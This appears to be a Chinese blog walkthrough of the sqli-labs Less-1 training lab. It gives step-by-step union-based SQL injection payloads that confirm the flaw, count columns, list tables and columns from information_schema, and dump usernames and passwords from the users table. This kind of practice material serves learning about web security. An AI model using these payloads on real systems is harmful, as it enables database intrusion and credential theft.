1.进入环境就是这样的界面
2.尝试将URL中 id=1 改为 id=1’ and 1='1 页面正常
3.尝试将URL中 id=1 改为 id=1‘ and 1='2 页面显示不正常 (由步骤2和步骤3可确定为单引号注入)
4.使用 order by 语句进行字段查询
–+为SQL注入中URL里使用的注释符
构造 id=1’ order by 1 --+ 页面显示正常
构造 id=1’ order by 2 --+ 页面显示正常
构造 id=1’ order by 3 --+ 页面显示正常
构造 id=1’ order by 4 --+ 页面显示不正常 (说明页面存在三个字段)
5.使用联合查询 union select
构造 id=’ union select 1,2,3 --+ 确定每个字段所在位置
6.爆出当前数据库名和当前用户名
http://localhost/sqli-labs/Less-1/?id=' union select 1,database(),user() --+
7.爆出表名称
http://localhost/sqli-labs/Less-1/?id=' union select 1,table_name,user() from information_schema.tables where table_schema='security' --+
使用 group_concat 显示出查询到的所有信息
http://localhost/sqli-labs/Less-1/?id=' union select 1,group_concat(table_name),user() from information_schema.tables where table_schema='security' --+
查询到四个表,分别为 emails , referers,uagents,users
8.爆出users表中所有的列
http://localhost/sqli-labs/Less-1/?id=' union select 1,group_concat(column_name),user() from information_schema.columns where table_schema='security' and table_name='users' --+
9.最后查询用户密码数据
http://localhost/sqli-labs/Less-1/?id=' union select 1,group_concat(username,password),user() from users --+
看到最后,点个赞支持一下博主吧!